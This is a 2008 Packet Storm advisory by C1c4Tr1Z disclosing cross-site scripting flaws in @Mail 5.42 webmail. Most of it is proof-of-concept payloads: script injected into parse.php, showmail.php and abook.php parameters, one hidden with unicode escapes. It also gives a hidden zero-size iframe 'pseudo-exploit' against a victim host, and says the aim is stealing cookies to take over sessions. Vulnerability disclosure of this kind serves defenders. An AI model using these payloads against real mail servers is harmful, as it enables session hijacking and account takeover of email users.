atmail542-xss.txt

2008-08-31T00:00:00
ID PACKETSTORM:69540
Type packetstorm
Reporter C1c4Tr1Z
Modified 2008-08-31T00:00:00

Description

                                        
                                            `#=======================================================================#  
.____ _________ ._.  
| | ______ _ __/ _____/ ____ ____| |  
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |  
| |__( <_> ) / / \ ___/\ \___\|  
|_______ \____/ \/\_/ /_______ /\___ >\___ >_  
\/ \/ \/ \/\/  
(http://wwwlowsec.org)  
#========================================================================#  
#========================================================================#  
Author: C1c4Tr1Z  
Date: 30/08/08  
Application: @Mail 5.42 (28/11/2007)  
Product WebSite: http://atmail.com/  
Issues:  
[-]Cross-Site Scripting  
  
#========================================================================#  
#=============================[XSS]======================================#  
  
This application suffers from numerous Cross-Site Scripting.With some   
JavaScript knowledge, we are able to execute JS codes to stealcookies to   
use the sessions, or anothers changes/actions.  
  
POC:  
  
/parse.php?file="><img/src/onerror=alert(document.cookie)>  
/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo='  
/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo='  
/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195  
/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie)  
  
Pseudo-Exploit:  
  
<iframe src="http://www.victim.com/parse.php?file=%22%3E%3Cimg/src/onerror=alert(document.cookie)%3E" frameBorder="0" style="height:0px;width:0px;">  
  
  
#========================================================================#  
#========================================================================#  
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>  
(http://wwwlowsec.org)  
LowSec! Web Application Security (Lab).  
Deus ex Machina  
#========================================================================#  
`